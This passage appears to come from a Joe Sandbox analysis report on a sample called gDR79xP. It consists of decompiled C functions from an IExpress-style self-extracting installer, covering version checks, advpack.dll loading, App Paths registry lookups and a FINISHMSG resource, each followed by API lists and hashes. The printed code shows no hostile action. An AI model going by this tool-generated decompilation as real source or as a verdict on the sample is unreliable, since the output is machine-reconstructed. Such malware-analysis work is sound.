                                                                                                                                                                                                                                                							L33:
                                                                                                                                                                                                                                                							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                                							_v428 = _t135;
                                                                                                                                                                                                                                                							_v420 = _t135;
                                                                                                                                                                                                                                                							__eflags = _t135 - 2;
                                                                                                                                                                                                                                                						} while (_t135 < 2);
                                                                                                                                                                                                                                                						goto L36;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__eflags = _t77 == 1;
                                                                                                                                                                                                                                                					if(_t77 == 1) {
                                                                                                                                                                                                                                                						 *0x109a40 = _t119;
                                                                                                                                                                                                                                                						 *0x108184 = 1;
                                                                                                                                                                                                                                                						 *0x108180 = 1;
                                                                                                                                                                                                                                                						__eflags = _t133 - 3;
                                                                                                                                                                                                                                                						if(_t133 > 3) {
                                                                                                                                                                                                                                                							__eflags = _t133 - 5;
                                                                                                                                                                                                                                                							if(_t133 < 5) {
                                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t113 = 3;
                                                                                                                                                                                                                                                							_t119 = _t113;
                                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t119 = 1;
                                                                                                                                                                                                                                                						_t114 = 3;
                                                                                                                                                                                                                                                						 *0x109a40 = 1;
                                                                                                                                                                                                                                                						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                                						if(__eflags < 0) {
                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                							 *0x108184 = _t135;
							*0x108180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E001044B9(0, _t138);
					L66:
					return E00106CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103a09
                                                                                                                                                                                                                                                0x001039fc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001039fc
                                                                                                                                                                                                                                                0x001039d3
                                                                                                                                                                                                                                                0x001039d8
                                                                                                                                                                                                                                                0x001039da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001039dc
                                                                                                                                                                                                                                                0x001039b6
                                                                                                                                                                                                                                                0x00103955
                                                                                                                                                                                                                                                0x0010395b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103961
                                                                                                                                                                                                                                                0x00103963
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103969
                                                                                                                                                                                                                                                0x00103969
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103969
                                                                                                                                                                                                                                                0x00103915
                                                                                                                                                                                                                                                0x00103915
                                                                                                                                                                                                                                                0x0010391b
                                                                                                                                                                                                                                                0x0010391f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010392d
                                                                                                                                                                                                                                                0x00103933
                                                                                                                                                                                                                                                0x00103938
                                                                                                                                                                                                                                                0x0010393a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103940
                                                                                                                                                                                                                                                0x00103946
                                                                                                                                                                                                                                                0x0010394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001038f2
                                                                                                                                                                                                                                                0x00103843
                                                                                                                                                                                                                                                0x00103845
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010384b
                                                                                                                                                                                                                                                0x0010384d
                                                                                                                                                                                                                                                0x00103883
                                                                                                                                                                                                                                                0x00103885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010389a
                                                                                                                                                                                                                                                0x0010389e
                                                                                                                                                                                                                                                0x0010389e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001038a0
                                                                                                                                                                                                                                                0x001038a0
                                                                                                                                                                                                                                                0x001038a2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001038a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001038a4
                                                                                                                                                                                                                                                0x0010384f
                                                                                                                                                                                                                                                0x00103851
                                                                                                                                                                                                                                                0x00103857
                                                                                                                                                                                                                                                0x0010386e
                                                                                                                                                                                                                                                0x00103877
                                                                                                                                                                                                                                                0x0010387b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103881
                                                                                                                                                                                                                                                0x00103859
                                                                                                                                                                                                                                                0x0010385c
                                                                                                                                                                                                                                                0x00103862
                                                                                                                                                                                                                                                0x00103866
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103868
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001038f4
                                                                                                                                                                                                                                                0x001038f4
                                                                                                                                                                                                                                                0x001038f5
                                                                                                                                                                                                                                                0x001038fb
                                                                                                                                                                                                                                                0x00103901
                                                                                                                                                                                                                                                0x00103901
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010390a
                                                                                                                                                                                                                                                0x0010374b
                                                                                                                                                                                                                                                0x0010374e
                                                                                                                                                                                                                                                0x0010375c
                                                                                                                                                                                                                                                0x00103764
                                                                                                                                                                                                                                                0x00103769
                                                                                                                                                                                                                                                0x0010376e
                                                                                                                                                                                                                                                0x00103771
                                                                                                                                                                                                                                                0x0010379c
                                                                                                                                                                                                                                                0x0010379f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001037a3
                                                                                                                                                                                                                                                0x001037a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001037a4
                                                                                                                                                                                                                                                0x00103773
                                                                                                                                                                                                                                                0x00103777
                                                                                                                                                                                                                                                0x00103778
                                                                                                                                                                                                                                                0x0010377f

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00103723
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 001039C3
                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 001039F1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                • String ID: 3$lenta
                                                                                                                                                                                                                                                • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                                • Opcode ID: c67a03afc23dae4e2ced4c98237eef2ec0065a49e9c3f3197808456dd2aa9bbb
                                                                                                                                                                                                                                                • Instruction ID: 6035c4527165c3823c77b6b4204ae2688314eec60a8833a87c6b2af57f92467c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67a03afc23dae4e2ced4c98237eef2ec0065a49e9c3f3197808456dd2aa9bbb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F691D571B01224DFEB398B14CC917AAB7A9AF85304F1541AAD9E9D72D1DBF08F81CB41
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                                			E00106495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				signed char _t14;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                                				CHAR* _t26;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t27 = __esi;
                                                                                                                                                                                                                                                				_t18 = __ebx;
                                                                                                                                                                                                                                                				_t9 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				E00101781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                                				_t26 = "advpack.dll";
                                                                                                                                                                                                                                                				E0010658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                                				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001064DF
                                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001064F9
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00106502
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                                                                • API String ID: 438848745-179718922
                                                                                                                                                                                                                                                • Opcode ID: 0ec5a0a508d11837288066fec6e6cb817c8be9cec246399844ae826fde5a238a
                                                                                                                                                                                                                                                • Instruction ID: 039ac45aebcda4d55b62cfc8552671fc3a937b7a60088cb512ed3f6c02fd1935
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ec5a0a508d11837288066fec6e6cb817c8be9cec246399844ae826fde5a238a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE01F430A04208ABEB14EB64DC49EEE7778EF64310F900195F5C5A21D4DFF09EDACA51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E001028E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				char* _v12;
                                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                                				int _v28;
                                                                                                                                                                                                                                                				int _v32;
                                                                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                                                                				int _v40;
                                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                                                                                                                				long _t68;
                                                                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                                				void* _t79;
                                                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				void* _t88;
                                                                                                                                                                                                                                                				intOrPtr _t93;
                                                                                                                                                                                                                                                				intOrPtr _t97;
                                                                                                                                                                                                                                                				intOrPtr _t99;
                                                                                                                                                                                                                                                				int _t101;
                                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                                				void* _t106;
                                                                                                                                                                                                                                                				void* _t109;
                                                                                                                                                                                                                                                				void* _t110;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v12 = __edx;
                                                                                                                                                                                                                                                				_t99 = __ecx;
                                                                                                                                                                                                                                                				_t106 = 0;
                                                                                                                                                                                                                                                				_v16 = __ecx;
                                                                                                                                                                                                                                                				_t87 = 0;
                                                                                                                                                                                                                                                				_t103 = 0;
                                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                                				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                                					L19:
                                                                                                                                                                                                                                                					_t106 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t62 = 0;
                                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                                						if(E00102773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                                							goto L20;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                                						_v28 = _t68;
                                                                                                                                                                                                                                                						if(_t68 == 0) {
                                                                                                                                                                                                                                                							_t99 = _v16;
                                                                                                                                                                                                                                                							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                                							_t93 = _v24;
                                                                                                                                                                                                                                                							_t87 = _v20;
                                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                                								goto L18;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                                							if(_t103 != 0) {
                                                                                                                                                                                                                                                								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                                								_v36 = _t73;
                                                                                                                                                                                                                                                								if(_t73 != 0) {
                                                                                                                                                                                                                                                									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                                										L15:
                                                                                                                                                                                                                                                										GlobalUnlock(_t103);
                                                                                                                                                                                                                                                										_t99 = _v16;
                                                                                                                                                                                                                                                										L18:
                                                                                                                                                                                                                                                										_t87 = _t87 + 1;
                                                                                                                                                                                                                                                										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                                										_v20 = _t87;
                                                                                                                                                                                                                                                										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                                										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                                											continue;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L19;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t79 = _v44;
                                                                                                                                                                                                                                                										_t88 = _t106;
                                                                                                                                                                                                                                                										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                                										_t101 = _v28;
                                                                                                                                                                                                                                                										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                                										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                                										_t97 = _v48;
                                                                                                                                                                                                                                                										_v36 = _t83;
                                                                                                                                                                                                                                                										_t109 = _t83;
                                                                                                                                                                                                                                                										do {
                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00102A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00102A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                                											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                                											_t88 = _t88 + 4;
                                                                                                                                                                                                                                                										} while (_t88 < 8);
                                                                                                                                                                                                                                                										_t87 = _v20;
                                                                                                                                                                                                                                                										_t106 = 0;
                                                                                                                                                                                                                                                										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                                											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                                												GlobalUnlock(_t103);
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												goto L15;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L15;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				L20:
                                                                                                                                                                                                                                                				 *_a8 = _t87;
                                                                                                                                                                                                                                                				if(_t103 != 0) {
                                                                                                                                                                                                                                                					GlobalFree(_t103);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t106;
                                                                                                                                                                                                                                                			}


































                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalFree.KERNEL32 ref: 00102A6F
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: CharUpperA.USER32(B5A2E1BC,00000000,00000000,00000000), ref: 001027A8
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: CharNextA.USER32(0000054D), ref: 001027B5
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: CharNextA.USER32(00000000), ref: 001027BC
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102829
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: RegQueryValueExA.ADVAPI32(?,00101140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102852
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102870
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001028A0
                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00103938,?,?,?,?,-00000005), ref: 00102958
                                                                                                                                                                                                                                                • GlobalLock.KERNEL32 ref: 00102969
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00103938,?,?,?,?,-00000005,?), ref: 00102A21
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00102A81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3949799724-0
                                                                                                                                                                                                                                                • Opcode ID: d1e4f9bcdfafa6e18a42f711f61ff562633fa71d72c7c783d8a5d3ecf8719141
                                                                                                                                                                                                                                                • Instruction ID: 59f887164d5c3effe53af5b399734b6832649911ac5404da4c262c964bdec73d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1e4f9bcdfafa6e18a42f711f61ff562633fa71d72c7c783d8a5d3ecf8719141
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA513E31E00219EFCB25DF98C888AAEFBB5FF48700F14416AE985E3651DBB19D41DB90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                                			E00104169(void* __eflags) {
                                                                                                                                                                                                                                                				int _t18;
                                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 = E0010468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                                				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                                				if(_t21 != 0) {
                                                                                                                                                                                                                                                					if(E0010468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                                						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                                							return LocalFree(_t21);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(0x40);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(_t21);
                                                                                                                                                                                                                                                						_t18 = 0x3e9;
                                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                                						E001044B9(0, _t18);
                                                                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_push(0x10);
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_t18 = 0x4b1;
                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E001044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001030B4), ref: 00104189
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001030B4), ref: 001041E7
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                • Opcode ID: ffdf4dcc975d4a2230f961cf108fed28af686200fd031dccff00952445568669
                                                                                                                                                                                                                                                • Instruction ID: 76621849df8f5febe57cac1a4853f3ac2610f8f2e3d55689db2c1b843f779d8a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffdf4dcc975d4a2230f961cf108fed28af686200fd031dccff00952445568669
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D001A9F13002287BF32926664CD6F7B218EEBA4795F114129B7C6E25C0DBF8EC4141B9
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00107155() {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				struct _FILETIME _v16;
                                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                                				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				signed int _t36;
                                                                                                                                                                                                                                                				signed int _t37;
                                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                                				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                                				_t23 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                                					GetSystemTimeAsFileTime( &_v16);
